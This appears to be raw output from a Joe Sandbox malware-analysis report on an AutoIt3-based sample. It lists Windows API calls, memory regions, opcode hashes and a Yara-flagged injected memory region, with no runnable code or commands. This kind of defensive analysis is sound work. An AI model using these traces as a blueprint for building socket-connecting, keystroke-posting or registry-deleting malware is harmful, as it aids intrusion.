                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                      • String ID:
                                      • API String ID: 256516436-0
                                      • Opcode ID: 4fecaa903fc3b1d15a34762ab6c8d8f2f0d16680f7c55cc8879e55f591a28d15
                                      • Instruction ID: 3b62cebb4fea7ec55274ff2d69b939d7da7056911e437c05a8794244e5f2c320
                                      • Opcode Fuzzy Hash: 4fecaa903fc3b1d15a34762ab6c8d8f2f0d16680f7c55cc8879e55f591a28d15
                                      • Instruction Fuzzy Hash: 7D317271904119EFDF10EF98DC85E6EB778FF45300B2940A6F904EA256DB309A54DBA1
                                      APIs
                                      • DeleteObject.GDI32(00000000), ref: 00886810
                                      • GetDC.USER32(00000000), ref: 00886818
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00886823
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0088682F
                                      • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 0088686B
                                      • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 0088687C
                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0088964F,?,?,000000FF,00000000,?,000000FF,?), ref: 008868B6
                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008868D6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                      • String ID:
                                      • API String ID: 3864802216-0
                                      • Opcode ID: 47d98fccb1e8fb81eb739f5ff0bb5224057ce92a2c600a60c995fd9c45297dee
                                      • Instruction ID: 1b08ee604d3cfb19a1823a967477d7e97b1f02df83efe546cabe902f45d59ef4
                                      • Opcode Fuzzy Hash: 47d98fccb1e8fb81eb739f5ff0bb5224057ce92a2c600a60c995fd9c45297dee
                                      • Instruction Fuzzy Hash: 17316D721012147FEB11AF54CC8AFAA3FA9FF49761F084065FE08DA291D7759851CB70
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memcmp
                                      • String ID:
                                      • API String ID: 2931989736-0
                                      • Opcode ID: 86460b838df5c31f148537d5aa2b22074f68d66775c8831ef33062ddfd6a1c38
                                      • Instruction ID: 2134e1a763bdf3c9eb6c71a4f9310eb3ae42540e319ea99576f7f1c4b0cfc013
                                      • Opcode Fuzzy Hash: 86460b838df5c31f148537d5aa2b22074f68d66775c8831ef33062ddfd6a1c38
                                      • Instruction Fuzzy Hash: F321D3A67017197E9A0075289D46FAF376CFE3874AB180020FD02F6B42E714DF59CEA2
                                      APIs
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • _wcstok.LIBCMT ref: 0086F2D7
                                      • _wcscpy.LIBCMT ref: 0086F366
                                      • _memset.LIBCMT ref: 0086F399
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                      • String ID: X
                                      • API String ID: 774024439-3081909835
                                      • Opcode ID: 614bdfbbbc75d24c4b85cfa171767f58342404a81a89c9ea502af8026b1f5183
                                      • Instruction ID: 8c1c52a81cef0052c592b98663fcae595c2a51234d8fcc1653e80bccc4678b2f
                                      • Opcode Fuzzy Hash: 614bdfbbbc75d24c4b85cfa171767f58342404a81a89c9ea502af8026b1f5183
                                      • Instruction Fuzzy Hash: 4DC159716047419FC724EF68D845A9AB7E4FF84350F01492DFA99CB2A2DB30ED45CB92
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c295ba79bf877099ea4b0e0e2dbce36dd73e708fe7237b615d7f9797f1c547aa
                                      • Instruction ID: a3231322fbcc7743d4576c64d80989f08e3422d225cc8dfe831e0e7892943ebd
                                      • Opcode Fuzzy Hash: c295ba79bf877099ea4b0e0e2dbce36dd73e708fe7237b615d7f9797f1c547aa
                                      • Instruction Fuzzy Hash: 83715970900509EFDF45DF98CC89ABEBB79FF86324F148159F915AA291C730AA51CFA0
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0a8ea8ed6ced1c2761881a5ab345d5defc3b0ccad3b03f7bf48833e0ff51367d
                                      • Instruction ID: 14fceda62af16d0f63eab4cfe0dc61799ac39b3c580a4555b4c10322475b8748
                                      • Opcode Fuzzy Hash: 0a8ea8ed6ced1c2761881a5ab345d5defc3b0ccad3b03f7bf48833e0ff51367d
                                      • Instruction Fuzzy Hash: FE61A071208200ABC710EB28DC86E6FB7E8FF94714F148919F65AD72A2DB70DD45CB96
                                      APIs
                                      • IsWindow.USER32(00EA5FF8), ref: 0088BA5D
                                      • IsWindowEnabled.USER32(00EA5FF8), ref: 0088BA69
                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0088BB4D
                                      • SendMessageW.USER32(00EA5FF8,000000B0,?,?), ref: 0088BB84
                                      • IsDlgButtonChecked.USER32(?,?), ref: 0088BBC1
                                      • GetWindowLongW.USER32(00EA5FF8,000000EC), ref: 0088BBE3
                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0088BBFB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                      • String ID:
                                      • API String ID: 4072528602-0
                                      • Opcode ID: c6526e3aaf5a788d594542999eacba87946fed150c47f5c67ce72ad2db5baff8
                                      • Instruction ID: 76e5d4129f7684d67aa3bcfac060d4be00fa57fd42db73e64cf3274ab6677d2b
                                      • Opcode Fuzzy Hash: c6526e3aaf5a788d594542999eacba87946fed150c47f5c67ce72ad2db5baff8
                                      • Instruction Fuzzy Hash: 6371DD34605214AFDB29EF94C894FBABBB9FF89310F044069EA55D72A1CB31AC50DF60
                                      APIs
                                      • _memset.LIBCMT ref: 0087FB31
                                      • _memset.LIBCMT ref: 0087FBFA
                                      • ShellExecuteExW.SHELL32(?), ref: 0087FC3F
                                        • Part of subcall function 00804D37: __itow.LIBCMT ref: 00804D62
                                        • Part of subcall function 00804D37: __swprintf.LIBCMT ref: 00804DAC
                                        • Part of subcall function 0081436A: _wcscpy.LIBCMT ref: 0081438D
                                      • GetProcessId.KERNEL32(00000000), ref: 0087FCB6
                                      • CloseHandle.KERNEL32(00000000), ref: 0087FCE5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                      • String ID: @
                                      • API String ID: 3522835683-2766056989
                                      APIs
                                      • GetParent.USER32(?), ref: 0086178B
                                      • GetKeyboardState.USER32(?), ref: 008617A0
                                      • SetKeyboardState.USER32(?), ref: 00861801
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 0086182F
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 0086184E
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00861894
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008618B7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      APIs
                                      • GetParent.USER32(00000000), ref: 008615A4
                                      • GetKeyboardState.USER32(?), ref: 008615B9
                                      • SetKeyboardState.USER32(?), ref: 0086161A
                                      • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00861646
                                      • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00861663
                                      • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008616A7
                                      • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008616C8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: _wcsncpy$LocalTime
                                      • String ID:
                                      • API String ID: 2945705084-0
                                      APIs
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00863B8A,?), ref: 00864BE0
                                        • Part of subcall function 00864BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00863B8A,?), ref: 00864BF9
                                      • lstrcmpiW.KERNEL32(?,?), ref: 00863BAA
                                      • _wcscmp.LIBCMT ref: 00863BC6
                                      • MoveFileW.KERNEL32(?,?), ref: 00863BDE
                                      • _wcscat.LIBCMT ref: 00863C26
                                      • SHFileOperationW.SHELL32(?), ref: 00863C92
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                      • String ID: \*.*
                                      • API String ID: 1377345388-1173974218
                                      APIs
                                      • _memset.LIBCMT ref: 008878CF
                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00887976
                                      • IsMenu.USER32(?), ref: 0088798E
                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 008879D6
                                      • DrawMenuBar.USER32 ref: 008879E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: Menu$Item$DrawInfoInsert_memset
                                      • String ID: 0
                                      • API String ID: 3866635326-4108050209
                                      APIs
                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00881631
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0088165B
                                      • FreeLibrary.KERNEL32(00000000), ref: 00881712
                                        • Part of subcall function 00881602: RegCloseKey.ADVAPI32(?), ref: 00881678
                                        • Part of subcall function 00881602: FreeLibrary.KERNEL32(?), ref: 008816CA
                                        • Part of subcall function 00881602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 008816ED
                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 008816B5
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: EnumFreeLibrary$CloseDeleteOpen
                                      • String ID:
                                      • API String ID: 395352322-0
                                      APIs
                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00886911
                                      • GetWindowLongW.USER32(00EA5FF8,000000F0), ref: 00886944
                                      • GetWindowLongW.USER32(00EA5FF8,000000F0), ref: 00886979
                                      • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 008869AB
                                      • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008869D5
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 008869E6
                                      • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00886A00
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LongWindow$MessageSend
                                      • String ID:
                                      • API String ID: 2178440468-0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E2CA
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E2F0
                                      • SysAllocString.OLEAUT32(00000000), ref: 0085E2F3
                                      • SysAllocString.OLEAUT32(?), ref: 0085E311
                                      • SysFreeString.OLEAUT32(?), ref: 0085E31A
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085E33F
                                      • SysAllocString.OLEAUT32(?), ref: 0085E34D
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      APIs
                                        • Part of subcall function 00878475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 008784A0
                                      • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 008768B1
                                      • WSAGetLastError.WSOCK32(00000000), ref: 008768C0
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 008768F9
                                      • connect.WSOCK32(00000000,?,00000010), ref: 00876902
                                      • WSAGetLastError.WSOCK32 ref: 0087690C
                                      • closesocket.WSOCK32(00000000), ref: 00876935
                                      • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0087694E
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                      • String ID:
                                      • API String ID: 910771015-0
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E3A5
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0085E3CB
                                      • SysAllocString.OLEAUT32(00000000), ref: 0085E3CE
                                      • SysAllocString.OLEAUT32 ref: 0085E3EF
                                      • SysFreeString.OLEAUT32 ref: 0085E3F8
                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0085E412
                                      • SysAllocString.OLEAUT32(?), ref: 0085E420
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                      • String ID:
                                      • API String ID: 3761583154-0
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp
                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                      • API String ID: 1038674560-2734436370
                                      APIs
                                        • Part of subcall function 00802111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0080214F
                                        • Part of subcall function 00802111: GetStockObject.GDI32(00000011), ref: 00802163
                                        • Part of subcall function 00802111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0080216D
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00887C57
                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00887C64
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00887C6F
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00887C7E
                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00887C8A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: MessageSend$CreateObjectStockWindow
                                      • String ID: Msctls_Progress32
                                      • API String ID: 1025951953-3636473452
                                      APIs
                                      • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,03D19395), ref: 03D192F7
                                      • GetLastError.KERNEL32(WS2_32.DLL,00000000,03D19395), ref: 03D1930A
                                      • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 03D1935B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressErrorLastLibraryLoadProc
                                      • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                      • API String ID: 3511525774-1314211545
                                      • Opcode ID: 1f9f78678458f3f2026c90a1b63dd3c8a0a7480bf961aa4056ee509896e01c53
                                      • Instruction ID: 47d437220a1b047f97c3476065d469977310b26e7227689f7988a0540c448f38
                                      • Opcode Fuzzy Hash: 1f9f78678458f3f2026c90a1b63dd3c8a0a7480bf961aa4056ee509896e01c53
                                      • Instruction Fuzzy Hash: 26219D7AE04304FFCB14EFB4E960A9EB7B8EB28310F014469E415D7784D731AA10EB90
                                      APIs
                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00850817,?,?,00000000,00000000), ref: 00869EE8
                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00850817,?,?,00000000,00000000), ref: 00869EFF
